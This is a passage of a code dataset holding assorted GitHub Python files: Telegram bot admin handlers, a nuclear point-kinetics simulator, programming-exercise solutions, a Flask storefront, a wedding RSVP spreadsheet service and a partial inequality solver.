нажав на него)\",\n reply_markup=get_cancel_button())\n msg_id = callback.message.message_id\n await state.update_data(msg=msg_id)\n else:\n await state.clear()\n await db.update_proffer(content=data[\"content\"], title=data[\"title\"], id_proffer=int(data[\"id_proffer\"]))\n await callback.message.edit_text(text=f\"Пришло новое предложение!\\n\\n\\n\"\n f\"{data['title']}\\n\\n\"\n f\"{data['content']}\",\n reply_markup=get_check_keyboard())\n\n@admin_router.message(Edit.title)\nasync def edit_title(message: types.Message, state: FSMContext):\n new_title = message.text\n if len(new_title) > 50:\n await message.answer(\"В заголовке должно быть не больше 50 символов\")\n else:\n data = await state.get_data()\n await state.update_data(title=new_title)\n await message.delete()\n await DeleteMessage(chat_id=message.chat.id, message_id=data[\"msg\"])\n await state.set_state(Edit.edit)\n await message.answer(\"Название обновлено, чтобы вы хотели изменить?\",\n reply_markup=get_edit_keyboard())\n\n@admin_router.message(Edit.content)\nasync def edit_title(message: types.Message, state: FSMContext):\n new_text = message.text\n if len(new_text) > 300:\n await message.answer(\"В текстке должно быть не больше 300 символов\")\n else:\n data = await state.get_data()\n await state.update_data(content=new_text)\n await message.delete()\n await DeleteMessage(chat_id=message.chat.id, message_id=data[\"msg\"])\n await state.set_state(Edit.edit)\n await message.answer(\"Содержание обновлено, чтобы вы хотели изменить?\",\n reply_markup=get_edit_keyboard())\n\n@admin_router.callback_query(Text(text=\"cancel\"))\nasync def go_back(callback: types.CallbackQuery, state: FSMContext):\n current_state = await state.get_state()\n if current_state == \"Comment:comment\":\n data = await state.get_data()\n await callback.message.edit_text(text=data[\"msg1\"],\n reply_markup=get_check_keyboard())\n else:\n await state.set_state(Edit.edit)\n await callback.message.edit_text(\"Чтобы вы хотели изменить?\",\n reply_markup=get_edit_keyboard())\n\n@admin_router.message(Comment.comment)\nasync def comment_add(message: types.Message, state: FSMContext):\n data = await state.get_data()\n comment = message.text\n await message.delete()\n await DeleteMessage(chat_id=message.chat.id, message_id=data[\"msg\"])\n try:\n await db.update_proffer_comment(comment=comment, id_proffer=data[\"id_proffer\"])\n await message.answer(f\"Комментарий добавлен.\\n\"\n f\"{data['msg1']}\",\n reply_markup=get_check_keyboard())\n await state.clear()\n except:\n await message.answer(\"Возможно вы использовали неправильные символы.\\n\"\n \"Напишите свой комментарий еще раз\",\n reply_markup=get_cancel_button())\n await state.update_data(msg=message.message_id, comment=comment)\n\n","repo_name":"M1GUSTA/platfrom_bot","sub_path":"tgbot/handlers/admin.py","file_name":"admin.py","file_ext":"py","file_size_in_byte":10813,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"40"} +{"seq_id":"23522184151","text":"\"\"\"\nThis file contains some functions in python which I think it will be useful in the future\n\"\"\"\n\n\nclass PKModel(object):\n def __init__(self,n=1.0,beta=[0.000215,0.001424,0.001274,0.002568,0.000748,0.000273],llambda=[0.0124,0.0305,0.111,0.301,1.14,3.01],promptGeT=2.0e-5):\n self.n=n\n self.beta=beta\n self.llambda=llambda\n self.promptGeT=promptGeT\n self.precCon=[]\n\n self.sumbeta=0.0\n for i in self.beta:\n self.sumbeta+=i\n\n self.check()\n self.calcpreCon()\n\n \n def check(self):\n if len(self.beta)!=len(self.llambda):\n print(\"The lenght of beta and llambda are not equal.\")\n \n\n def calcpreCon(self):\n print(len(self.beta))\n for i in range(len(self.beta)):\n self.precCon.append(self.beta[i]*self.n/self.promptGeT/self.llambda[i])\n \n def nextTimeStep(self,rho,dt=0.0001):\n\n \n if dt>0.0001:\n a = int(dt/0.0001)\n b = dt%0.0001\n\n dt = 0.0001\n else:\n a = 1\n b = -1.0\n\n dt=dt\n\n for i in range(a):\n\n self.dn=rho/self.promptGeT*self.n*dt\n\n self.dCon=[]\n\n for i in range(len(self.beta)):\n self.dCon.append((self.beta[i]/self.promptGeT*self.n-self.llambda[i]*self.precCon[i])*dt)\n self.dn-=self.dCon[-1]\n #print(self.dn)\n #print(self.precCon)\n self.synchronize()\n if b>0:\n self.dn=rho/self.promptGeT*self.n*b\n\n self.dCon=[]\n\n for i in range(len(self.beta)):\n self.dCon.append((self.beta[i]/self.promptGeT*self.n-self.llambda[i]*self.precCon[i])*b)\n self.dn-=self.dCon[-1]\n #print(self.dn)\n #print(self.precCon)\n self.synchronize() \n \n \n def synchronize(self):\n self.n+=self.dn\n for i in range(len(self.beta)):\n self.precCon[i]+=self.dCon[i]\n\n\nif __name__==\"__main__\":\n \n import matplotlib.pyplot as plt\n\n reactor = PKModel(n=10000)\n #print(reactor.precCon)\n n=[]\n time=[]\n n.append(reactor.n)\n time.append(0)\n\n dt=0.011\n for i in range(100):\n time.append(dt*(i+1))\n reactor.nextTimeStep(-5.0e-3,dt)\n n.append(reactor.n)\n \n reactor2 = PKModel(n=10000)\n n2=[10000]\n time2=[0]\n dt=0.0001\n for i in range(100000):\n time2.append(dt*(i+1))\n reactor2.nextTimeStep(-5.0e-3,dt)\n n2.append(reactor2.n)\n\n\n fig = plt.figure()\n\n ax = fig.add_axes([0.1, 0.1, 0.6, 0.75])\n\n ax.plot(time, n)\n ax.plot(time2, n2)\n\n reactor3 = PKModel(n=10000)\n time=[0,0.1,1,5,10]\n dt=[]\n n3 = [10000]\n for i in range(len(time)-1):\n dt=time[i+1]-time[i]\n reactor3.nextTimeStep(-5.0e-3,dt)\n n3.append(reactor3.n)\n ax.plot(time, n3,\"bo\") \n plt.show()\n ","repo_name":"Vincentdudu123/PackageNuclear","sub_path":"src/PKModel.py","file_name":"PKModel.py","file_ext":"py","file_size_in_byte":2933,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"40"} +{"seq_id":"17979183451","text":"import sys\ninput = sys.stdin.readline\n# f = open('input.txt', 'r')\n# input = f.readline\n\nn = int(input())\nmat = []\nfor i in range(n):\n mat.extend(list(map(int,list(input().strip()))))\n\ndef rec(n,lst):\n k = sum(lst)\n\n if k== 0:\n return '0'\n elif k== n**2:\n return '1'\n else :\n lst1 = []\n lst2 = []\n lst3 = []\n lst4 = []\n for i in range(n//2):\n lst1.extend(lst[i*n:i*n+n//2])\n lst2.extend(lst[i*n+n//2:(i+1)*n])\n lst3.extend(lst[(n//2)*n + i*n:(n//2)*n + i*n + n//2 ])\n lst4.extend(lst[(n//2)*n+i*n+n//2:(n//2)*n+(i+1)*n])\n m = n//2\n return f'({rec(m,lst1)}{rec(m,lst2)}{rec(m,lst3)}{rec(m,lst4)})'\n\n\nprint(rec(n,mat))","repo_name":"DailyStudy08/jiyoung_backjoon","sub_path":"class1/1992.py","file_name":"1992.py","file_ext":"py","file_size_in_byte":738,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"40"} +{"seq_id":"7211371839","text":"'''\nSoma de Impares Consecutivos I\n'''\n\nx = int(input())\ny = int(input())\n\nif x < y:\n start = x\n end = y\nelse:\n start = y\n end = x\n\nresult = 0\n\nfor i in range(start+1, end):\n if i % 2 != 0:\n result += i\n\nprint(result)","repo_name":"demmorou/uri-answers","sub_path":"1071.py","file_name":"1071.py","file_ext":"py","file_size_in_byte":239,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"40"} +{"seq_id":"17053788479","text":"from ..searcher.searcher import Searcher\nfrom ..general import ALG_BM25, m_c2p, TO_JUPYTER\nimport logging\nimport string\nimport os\nfrom shutil import copyfile\n\nclass Tester:\n def __init__(self):\n self.searcher = Searcher(algorithm=ALG_BM25, idxVarFile='invIdxVar-obo-lemma-low')\n self.viewTemplate = string.Template(\"\"\"\n
\n
\n ${header}\n

\n ${content}\n

\n
\n \"\"\")\n self.staticDir = os.path.join(os.path.abspath(''),'static')\n if not os.path.exists(self.staticDir):\n os.makedirs(self.staticDir)\n\n def searchSedmls(self, query, top=10, page=1):\n result = self.searcher.search(query, top=top, page=page)\n html=''\n for rs, val in result['candidates'].items():\n header = 'SEDML: %s
'%(val['url'],val['url'])\n content = ''\n\n for imageLink in [val['path']]:\n if not os.path.isfile(os.path.join(self.staticDir, imageLink.rsplit('/',1)[1])):\n copyfile(imageLink, os.path.join(self.staticDir, imageLink.rsplit('/',1)[1]))\n content += '\"drawing\"
'\n\n if 'cellmlImages' in val:\n for imgUrl in val['cellmlImages']:\n content += '\"drawing\"
'\n\n content += 'CellML: %s
'%(val['cellmlUrl'],val['cellmlUrl'])\n content += 'Workspace: %s
'%(val['workspaceUrl'],val['workspaceUrl'])\n # print exposures\n if len(val['exposures']) > 0:\n content += 'Exposures:
    '\n for cellmlUrl in val['exposures']:\n content += '
  • %s
  • '%(cellmlUrl,cellmlUrl)\n content += '
'\n\n # print similar cellmls\n if len(val['similarCellmls']) > 0:\n content += 'Similar CellMLs:
    '\n for cellmlUrl in val['similarCellmls']:\n content += '
  • %s
  • '%(cellmlUrl,cellmlUrl)\n content += '
'\n\n # print maths and dependencies\n content += '
    '\n for varId, varData in val['variable'].items():\n content += self.__printMath(varData)\n content += '
    '\n content += '
'\n\n # replace value in html template\n replacer = {'header':header, 'content':content}\n html += self.viewTemplate.substitute(replacer)\n return {'html':html, 'page':page, 'top':top, 'length':result['length']}\n\n def __printMath(self, varData):\n def getVarMd(varData):\n logger = logging.getLogger()\n varMd = '
  • ' + '; '.join(['name: %s'%varData['name'], 'type: %s'%varData['type'], 'init: %s'%varData['init']])\n if 'rate' in varData:\n varMd += '; rate: %s'%str(varData['rate'])\n varMd += '; unit: ' + varData['unit']['text'] + '
    ' if 'unit' in varData else '
    '\n for k, mth in varData['math'].items():\n logger.disabled = True\n lttex = m_c2p(mth, destination=TO_JUPYTER)\n varMd += lttex + \"
    \"\n\n if 'dependent' in varData:\n if len(varData['dependent']) > 0:\n varMd += '
      • dependents: '\n for varIdDept, varDataDept in varData['dependent'].items():\n varMd += getVarMd(varDataDept)\n varMd += '
    '\n logger.disabled = False\n\n return varMd + '
  • '\n\n varMd = getVarMd(varData)\n return varMd\n\n def searchVariables(self, query, top=10, page=1):\n result = self.searcher._Searcher__getVariables(query, top=top, page=page)\n html = ''\n for rs, val in result['candidates'].items():\n header = '; '.join(['name: %s'%val['name'], 'type: %s'%val['type'], 'init: %s'%str(val['init'])])\n if 'rate' in val:\n header += '; rate: %s'%str(val['rate'])\n header += '; unit: ' + val['unit']['text'] if 'unit' in val else ''\n content = 'CellML: %s
    '%(val['cellmlUrl'],val['cellmlUrl'])\n content += 'Workspace: %s
    '%(val['workspaceUrl'],val['workspaceUrl'])\n # print exposures\n if len(val['exposures']) > 0:\n content += 'Exposures:
      '\n for cellmlUrl in val['exposures']:\n content += '
    • %s
    • '%(cellmlUrl,cellmlUrl)\n content += '
    '\n\n # print similar cellmls\n if len(val['similarCellmls']) > 0:\n content += 'Similar CellMLs:
      '\n for cellmlUrl in val['similarCellmls']:\n content += '
    • %s
    • '%(cellmlUrl,cellmlUrl)\n content += '
    '\n\n # print images\n if 'cellmlImages' in val:\n for imgUrl in val['cellmlImages']:\n content += '\"drawing\"
    '\n\n content += self.__printMath(val)\n content += '
    '\n\n replacer = {'header':header, 'content':content}\n html += self.viewTemplate.substitute(replacer)\n\n return {'html':html, 'page':page, 'top':top, 'length':result['length']}\n","repo_name":"napakalas/casbert-indexer","sub_path":"casbert_indexer/tester/tester.py","file_name":"tester.py","file_ext":"py","file_size_in_byte":5936,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"40"} +{"seq_id":"43573220881","text":"def Preprocessing_msg(data):\n names=['Amit','Charlie','Debbie','Jim','Triveni']\n unames=['amit','charlie','dsk','jim','triveni']\n ctr=0\n labels=[]\n messages=[]\n noise=0\n for line in data:\n seg= line.strip().lower().replace('<','').split('>')\n #print(seg)\n if len(seg) < 2:\n #print(seg)\n noise +=1\n elif len(seg) > 2:\n #print(seg)\n noise += 1\n else:\n for name in unames:\n if name in seg[0]:\n labels.append(names[unames.index(name)])\n messages.append(seg[1])\n ctr+=1\n return messages, labels\n\n#hlogs = open('logs.log',\"r\")\n#data = hlogs.readlines()\n#X,y = Preprocessing_msg(data)\n#print(y)","repo_name":"amitrecords/whoami","sub_path":"whoami/funk.py","file_name":"funk.py","file_ext":"py","file_size_in_byte":773,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"40"} +{"seq_id":"40384925280","text":"import secrets\nfrom flask import Flask, render_template, request\nfrom flask_login import LoginManager, login_required, current_user\nfrom api.model.user import User\nfrom api.model.store import Store\nfrom api.route.auth import auth_bp\nfrom api.route.store import store_bp, decodeStore\nfrom api.route.item import item_bp, decodeItem\nfrom api.services.database import get_stores, get_store, get_items, get_item\n\napp = Flask(__name__)\napp.register_blueprint(auth_bp, url_prefix=\"/api\")\napp.register_blueprint(store_bp, url_prefix=\"/api\")\napp.register_blueprint(item_bp, url_prefix=\"/api\")\n\napp.config[\"SECRET_KEY\"] = secrets.token_hex(24)\n\nlogin_manager = LoginManager()\nlogin_manager.init_app(app)\n\n@login_manager.user_loader\ndef load_user(user_id):\n return User(user_id)\n\n@app.route(\"/\")\ndef home():\n return render_template(\"home.html\")\n\n@app.route(\"/login\")\ndef login():\n return render_template(\"login.html\")\n\n@app.route(\"/create_account\")\ndef create_account():\n return render_template(\"create_account.html\")\n\n@app.route(\"/dashboard\")\n@login_required\ndef dashboard():\n stores = get_stores(current_user.id)\n\n result = []\n for store in stores:\n result.append(decodeStore(store))\n\n return render_template(\"dashboard.html\", data=result)\n\n@app.route(\"/store\")\n@login_required\ndef store():\n store_id = request.args.get(\"store_id\")\n store_result = decodeStore(get_store(store_id=store_id))\n \n items_result = []\n items = get_items(store_id=store_id)\n for item in items:\n items_result.append(decodeItem(item))\n\n return render_template(\"store.html\", data=store_result, items=items_result)\n\n@app.route(\"/item\")\n@login_required\ndef item():\n item_id = request.args.get(\"item_id\")\n item_get = get_item(item_id=item_id)\n return render_template(\"product.html\", data=decodeItem(item_get))\n\nif __name__ == '__main__':\n app.run(port=8000, debug=True)","repo_name":"gabeiglio/Storefront","sub_path":"app.py","file_name":"app.py","file_ext":"py","file_size_in_byte":1900,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"40"} +{"seq_id":"16660037107","text":"from django.shortcuts import render\nimport requests\n\n# Create your views here.\ndef list (request):\n\turl = \"https://pokeapi.co/api/v2/pokemon/\"\n\n\tnxt = request.GET.get('nextPage')\n\tprev = request.GET.get('prevPage')\n\n\tif nxt:\n\t\tprint(nxt)\n\t\tprint(type(nxt))\n\t\tresponse = requests.get(nxt).json()\n\telif prev:\n\t\tprint(prev)\n\t\tprint(type(prev))\n\t\tresponse = requests.get(prev).json()\n\telse:\n\t\tresponse = requests.get(url).json()\n\n\tcontext = {\n\t\t'response': response,\n\t}\n\n\treturn render (request, \"list.html\", context)\n\ndef detail (request):\n\turl = request.GET.get('detail')\n\tresponse = requests.get(url).json()\n\n\tcontext = {\n\t\t\"results\": response,\n\t}\n\n\treturn render (request, \"detail.html\", context)\n\n","repo_name":"Mariam-Haitham/API","sub_path":"my_app/views.py","file_name":"views.py","file_ext":"py","file_size_in_byte":698,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"40"} +{"seq_id":"11872711285","text":"import pygame\nfrom Button import Button\n\n\nclass App:\n clock = pygame.time.Clock()\n game_exit = False\n\n def __init__(self, title, width, height, background_color=(255, 255, 255)):\n self.title = title\n self.width = width\n self.height = height\n self.background_color = background_color\n\n self.game_display = pygame.display.set_mode((width, height), pygame.SRCALPHA)\n\n self.button = Button(self.game_display, 0, 0, 100, 100, (255, 0, 0), \"Hello World\", \"Arial\", 10, (0, 0, 0))\n\n pygame.display.set_caption(title)\n self.main_loop()\n\n def main_loop(self):\n while not self.game_exit:\n\n for event in pygame.event.get():\n self.handle_keys(event)\n\n self.game_display.fill(self.background_color)\n self.render(self.game_display)\n pygame.display.update()\n self.update()\n self.clock.tick(60)\n\n def render(self, game_display):\n self.button.draw_button()\n\n def update(self):\n pass\n\n def handle_keys(self, event):\n if event.type == pygame.QUIT:\n self.game_exit = True\n\nif __name__ == \"__main__\":\n pygame.init()\n App(\"\", 500, 500)\n pygame.quit()\n exit()","repo_name":"GeburtstagsTorte/Homework","sub_path":"Homework Solution/Vlad/Button Fix/Main.py","file_name":"Main.py","file_ext":"py","file_size_in_byte":1244,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"40"} +{"seq_id":"72425859321","text":"import gspread\nimport json\nimport logging\nimport re\nfrom google.appengine.api import memcache\nfrom oauth2client.client import SignedJwtAssertionCredentials\n\n# credentials.json file from Google Cloud Console.\n# See: http://gspread.readthedocs.org/en/latest/oauth2.html\nCONFIG = json.load(open('credentials.json'))\nscope = ['https://spreadsheets.google.com/feeds']\n\ncredentials = SignedJwtAssertionCredentials(CONFIG['client_email'],\n CONFIG['private_key'].encode(), scope)\n\nDATA_WORKSHEET_NAME = \"Data\"\nCOL_INFO_NAME_PRIMARY = 1\n\nCOL_NAMES = [\n \"primaryName\",\n \"mailingName\",\n \"expectedGuests\",\n \"expectedHeadCount\",\n \"brideOrGroom\",\n \"category\",\n \"addressStreet\",\n \"addressCity\",\n \"addressState\",\n \"addressZipCode\",\n \"sdEnvelopePrinted\",\n \"invEnvelopePrinted\",\n \"rsvpCode\",\n \"rsvpResponseMethod\",\n \"rsvpAttending\",\n \"rsvpHeadcount\",\n \"rsvpComments\",\n \"rsvpGuestNames\",\n]\n\nCOL_INDEXES = {}\nCOL_LETTERS = {}\n\n# NOTE This just dynamically generates all the column indexes with their\n# names from above. This is easier in case I need to change the schema of\n# my spreadsheet later: I can just enter the new column in the list above\n# in its appropriate place and not have to worry about recalculating all\n# the indexes.\ndef magicIndexes():\n count = 1\n for name in COL_NAMES:\n COL_INDEXES[name] = count\n # This little hack will work as long as we stay under 26 columns\n COL_LETTERS[name] = chr((count - 1) + ord(\"A\"))\n count += 1\nmagicIndexes()\n\nSHARED_SERVICE = None\nSERVICE_CACHE_KEY = 'gspread'\n\n\ndef get_service():\n service = memcache.get(SERVICE_CACHE_KEY)\n if service is None:\n service = gspread.authorize(credentials)\n memcache.add(key=SERVICE_CACHE_KEY, value=service, time=3600)\n return service\n\n\nclass SpreadsheetService(object):\n\n spreadsheet_id = CONFIG['spreadsheet_id'] # For privacy.\n\n service = None\n spreadsheet = None\n worksheet = None\n\n def __init__(self):\n self.service = get_service()\n self.__getSpreadsheet()\n\n def __getSpreadsheet(self):\n if self.spreadsheet is None or self.worksheet is None:\n self.spreadsheet = self.service.open_by_key(self.spreadsheet_id)\n self.worksheet = self.spreadsheet.worksheet(DATA_WORKSHEET_NAME)\n\n def __findRowForCode(self, code):\n \"\"\"Finds the row of the spreadsheet which corresponds to a\n given RSVP code.\"\"\"\n\n # Find the number in the code and convert it to an integer.\n # Codes come in a format like this: `JONES5` where the final number\n # is the spreadsheet row number. This lets us find it in constant time.\n row_number = map(lambda e: int(e), re.findall('\\d+', code))\n if len(row_number):\n return row_number[0]\n\n def __fetchRowByNumberWithCode(self, row_number, code):\n \"\"\"Fetches a row by number, verifies it matches the code, and returns\n it if it does.\"\"\"\n # Now that we have a row number, let's make sure that it actually\n # matches. If it doesn't, we implicitly return None.\n row = self.worksheet.row_values(row_number)\n if row and self.__getValueFromRow(row, 'rsvpCode').lower() == code.lower():\n return row\n\n def __writeValue(self, row_number, col_name, value):\n \"\"\"Convenience method for writing a value to the spreadsheet.\"\"\"\n self.worksheet.update_cell(row_number, COL_INDEXES[col_name], value)\n\n def __getValueFromRow(self, row, col_name):\n \"\"\"Just a convenience accessor to get values from\n certain columns of a row.\"\"\"\n try:\n return row[COL_INDEXES[col_name] - 1]\n except IndexError:\n return None\n\n def guestLookup(self, code):\n \"\"\"Returns information about a guest based on their invite code.\"\"\"\n row_number = self.__findRowForCode(code)\n row = self.__fetchRowByNumberWithCode(row_number, code)\n\n if not row:\n return {\n \"status\": \"failed\",\n \"message\": \"A guest with that invite code was not found.\"\n }\n\n return {\n \"status\": \"success\",\n \"guest\": {\n \"code\": code,\n \"primaryName\": self.__getValueFromRow(row, \"primaryName\"),\n \"expectedGuests\": self.__getValueFromRow(row, \"expectedGuests\")\n }\n }\n\n def RSVP(self, code, attending, headcount, guests, comments=\"\"):\n row_number = self.__findRowForCode(code)\n row = self.__fetchRowByNumberWithCode(row_number, code)\n\n if not row:\n return {\n 'status': 'invalid',\n 'fields': ['rsvpCode']\n }\n\n rsvp_range = \"%s%d:%s%d\" % (COL_LETTERS[\"rsvpResponseMethod\"], row_number,\n COL_LETTERS[\"rsvpGuestNames\"], row_number)\n\n # This quirky method allows us to update them in a batch.\n selection = self.worksheet.range(rsvp_range)\n values = [\n \"Online\",\n \"YES\" if attending else \"NO\",\n headcount if attending else 0,\n comments,\n guests\n ]\n\n for cell, value in zip(selection, values):\n cell.value = value\n\n self.worksheet.update_cells(selection)\n\n return {\n 'status': 'success'\n }\n","repo_name":"zacharytamas/matrimony2","sub_path":"spreadsheet_api.py","file_name":"spreadsheet_api.py","file_ext":"py","file_size_in_byte":4935,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"40"} +{"seq_id":"11382372769","text":"import csv\nimport os.path\nfrom src.compas import direction\nfrom typing import Optional\n\n\ndef printing(data: Optional[dict], out_name: str) -> str:\n if data is None:\n return \"Please, check api key\"\n else:\n headers = None if os.path.exists(out_name) else data.keys()\n with open(out_name, \"a\", newline='') as f:\n writer = csv.writer(f)\n if headers is not None:\n writer.writerow(headers)\n writer.writerow(data.values())\n return f\"Weather in {data['city']}\\n\" \\\n f\"Country: {data['country']}\\n\" \\\n f\"State: {data['state']}\\n\" \\\n f\"Temperature: {data['temp']} \\N{degree sign}C\\n\" \\\n f\"Humidity: {data['hum']} %\\n\" \\\n f\"Wind speed: {data['windspeed']} m/s\\n\" \\\n f\"Wind direction: {direction(data['winddeg'])}\\n\" \\\n f\"By {data['provider']}\"\n","repo_name":"Idvon/Pogodnik","sub_path":"src/conclusion.py","file_name":"conclusion.py","file_ext":"py","file_size_in_byte":913,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"40"} +{"seq_id":"14019086497","text":"import numpy as np\nfrom random import randint, uniform, shuffle\n\nboundmax = 10000\nnum = '0123456789'\nalpha = 'abcdefghijklmnopqrstuvwxyzABCDEFGHIJKLMNOPQRSTUVWXYZ'\noper = '+-*/'\nrel = '=><'\n\nclass SYM:\n def __init__(self, name, sys):\n self.name = name\n self.bounds = [-boundmax, boundmax]\n self.value = 0\n self.isknown = False\n self.bounddist = self.bounds[1]-self.bounds[0]\n self.constraints = self.get_symbolic_constraints(sys)\n self.isdisjointwithsys = False\n \n def updatebounds(self, low, high):\n self.bounds = [round(low,1), round(high,1)]\n self.bounddist = self.bounds[1]-self.bounds[0]\n if self.bounddist > 0:\n self.value = round(uniform(self.bounds[0], self.bounds[1]), 1)\n self.isknown = False\n else:\n self.value = round(self.bounds[0],1)\n self.isknown = True\n \n def get_symbolic_constraints(self, sys):\n constraints = list()\n\n for ineq in sys:\n if self.name in ineq:\n if '=' in ineq:\n relation = '='\n if '>' in ineq:\n relation = '>'\n if '<' in ineq:\n relation = '<'\n\n splitineq = str.split(ineq, relation)\n LHS = splitineq[0]\n RHS = splitineq[1]\n \n Llist = str.split(LHS, ' ')[:-1]\n Rlist = str.split(RHS, ' ')[1:]\n \n if self.name in Llist or self.name in Rlist:\n\n if self.name in Rlist:\n temp = Rlist\n Rlist = Llist\n Llist = temp\n if relation != '=':\n if relation == '<':\n rela = '>'\n if relation == '>':\n rela = '<'\n relation = rela\n \n delidxs = list()\n for i in range(len(Llist)):\n if len(Llist[i]) > 1:\n elem = Llist[i][0]\n else:\n elem = Llist[i]\n if elem in alpha and Llist[i] != self.name:\n if i==0:\n Rlist.append('-')\n Rlist.append(Llist[i])\n delidxs.append(i)\n\n else:\n if Llist[i-1] == '+':\n Rlist.append('-')\n else:\n Rlist.append('+')\n Rlist.append(Llist[i])\n delidxs.append(i)\n delidxs.append(i-1)\n if Llist[i] == self.name and i > 0:\n delidxs.append(i-1)\n\n\n delidxs.sort()\n count = 0\n for i in delidxs:\n Llist.pop(i-count)\n count = count + 1\n\n RHS = ''\n for i in range(len(Rlist)):\n RHS = RHS + Rlist[i]\n if i < len(Rlist)-1:\n RHS = RHS + ' '\n \n \n ## This is probably unnecesary. #####################\n \n if RHS in num:\n if relation == '=':\n self.updatebounds(round(float(RHS),1),round(float(RHS),1))\n if relation == '>':\n self.updatebounds(round(float(RHS),1),boundmax)\n if relation == '<':\n self.updatebounds(-boundmax,round(float(RHS),1))\n if len(RHS)>1:\n if RHS[0] not in alpha and RHS[1] in num:\n if relation == '=':\n self.updatebounds(round(float(RHS),1),round(float(RHS),1))\n if relation == '>':\n self.updatebounds(round(float(RHS),1),boundmax)\n if relation == '<':\n self.updatebounds(-boundmax,round(float(RHS),1))\n\n #####################################################\n \n\n constraint = {'relation': relation, 'expression': RHS}\n constraints.append(constraint)\n\n return constraints\n\ndef extract_symbols(sys_ineq):\n syms = list()\n for i in range(len(sys_ineq)):\n components = str.split(sys_ineq[i], ' ')\n for j in range(len(components)):\n if len(components[j]) > 1:\n if components[j][0] in alpha:\n syms.extend([components[j]])\n else:\n if components[j] in alpha:\n syms.extend([components[j]])\n syms = list(set(syms))\n for i in range(len(syms)):\n syms[i] = SYM(syms[i], sys_ineq)\n return syms\n\ndef intersection(b1, b2, rel=None):\n if rel == None:\n rel = '='\n\n inter = [0,0]\n if rel == '=':\n if b2[0]>b1[1] or b1[0]>b2[1]:\n return 'disjoint'\n else:\n inter[0] = max(b1[0],b2[0])\n inter[1] = min(b1[1],b2[1])\n return inter\n\n if rel == '>':\n if b1[1] < b2[0]:\n return 'disjoint'\n else:\n inter[0] = max(b1[0],b2[0])\n inter[1] = min(b1[1],b2[1])\n return inter\n\n if rel == '<':\n if b1[0] > b2[1]:\n return 'disjoint'\n else:\n inter[0] = max(b1[0],b2[0])\n inter[1] = min(b1[1],b2[1])\n return inter\n\ndef update_bounds(syms):\n\n names = ['']*len(syms)\n for i in range(len(names)):\n names[i] = syms[i].name\n \n for sym in syms:\n if sym.isknown == False:\n for constraint in sym.constraints:\n relation = constraint['relation']\n RHS = str.split(constraint['expression'])\n \n RHSbound = [0,0]\n for i in range(len(RHS)):\n if RHS[i] in names:\n Rsym = syms[names.index(RHS[i])]\n if i == 0:\n RHSbound[0] = RHSbound[0] + Rsym.bounds[0]\n RHSbound[1] = RHSbound[1] + Rsym.bounds[1]\n else:\n if RHS[i-1] == '-':\n RHSbound[0] = RHSbound[0] - Rsym.bounds[0]\n RHSbound[1] = RHSbound[1] - Rsym.bounds[1]\n if RHS[i-1] == '+':\n RHSbound[0] = RHSbound[0] + Rsym.bounds[0]\n RHSbound[1] = RHSbound[1] + Rsym.bounds[1]\n \n # change this block\n # determine if RHS[i] is a number\n # negative, postive, long, short, whatever\n if len(RHS[i])>1:\n if RHS[i][0] not in alpha and RHS[i][1] in num:\n if i == 0:\n RHSbound[0] = RHSbound[0] + float(RHS[i])\n RHSbound[1] = RHSbound[1] + float(RHS[i])\n else:\n if RHS[i-1] == '-':\n RHSbound[0] = RHSbound[0] - float(RHS[i])\n RHSbound[1] = RHSbound[1] - float(RHS[i])\n if RHS[i-1] == '+':\n RHSbound[0] = RHSbound[0] + float(RHS[i])\n RHSbound[1] = RHSbound[1] + float(RHS[i])\n\n #change this too\n if RHS[i] in num:\n if i == 0:\n RHSbound[0] = RHSbound[0] + float(RHS[i])\n RHSbound[1] = RHSbound[1] + float(RHS[i])\n else:\n if RHS[i-1] == '-':\n RHSbound[0] = RHSbound[0] - float(RHS[i])\n RHSbound[1] = RHSbound[1] - float(RHS[i])\n if RHS[i-1] == '+':\n RHSbound[0] = RHSbound[0] + float(RHS[i])\n RHSbound[1] = RHSbound[1] + float(RHS[i])\n \n\n\n\n if RHSbound[0]>RHSbound[1]:\n temp = RHSbound[0]\n RHSbound[0] = RHSbound[1]\n RHSbound[1] = temp\n\n if RHSbound[0] < -boundmax:\n RHSbound[0] = -boundmax\n if RHSbound[1] > boundmax:\n RHSbound[1] = boundmax\n \n inter = intersection(sym.bounds, RHSbound, rel=relation)\n if inter == 'disjoint':\n #print('disjoint bounds:', sym.name, sym.bounds, constraint['relation'], constraint['expression'], RHSbound)\n sym.isdisjointwithsys = True\n return\n\n if inter[1]-inter[0] < sym.bounddist: \n if relation == '=':\n sym.updatebounds(inter[0],inter[1])\n if relation == '<':\n sym.updatebounds(sym.bounds[0],inter[1])\n if relation == '>':\n sym.updatebounds(inter[0], sym.bounds[1])\n \n #print(sym.name, sym.bounds, constraint['relation'], constraint['expression'], RHSbound)\n \n return\n\ndef tighten_bounds(syms):\n newbounds = [[0,0] for x in range(len(syms))]\n oldbounds = [[-boundmax,boundmax] for x in range(len(syms))]\n while not newbounds == oldbounds:\n update_bounds(syms)\n for i in range(len(syms)):\n oldbounds[i] = newbounds[i]\n newbounds[i] = syms[i].bounds\n return\n\ndef find_best_sym(syms):\n bestunknowncount = len(syms)\n bestbounddist = 2*boundmax\n\n symlist = ['']*len(syms)\n for i in range(len(symlist)):\n symlist[i] = syms[i]\n \n bestsym = ''\n\n for sym in syms:\n if sym.isknown == False:\n for constraint in sym.constraints:\n expression = constraint['expression']\n unknowncount = 0\n for Rsym in symlist:\n if Rsym.name in expression:\n if Rsym.isknown == False:\n unknowncount = unknowncount + 1\n #print(sym.name, constraint['relation'], expression, unknowncount) \n if unknowncount <= bestunknowncount and unknowncount > 0:\n if sym.bounddist <= bestbounddist:\n bestsym = sym\n bestbounddist = sym.bounddist\n bestunknowncount = unknowncount\n \n if bestsym == '':\n for sym in syms:\n if sym.isknown == False:\n 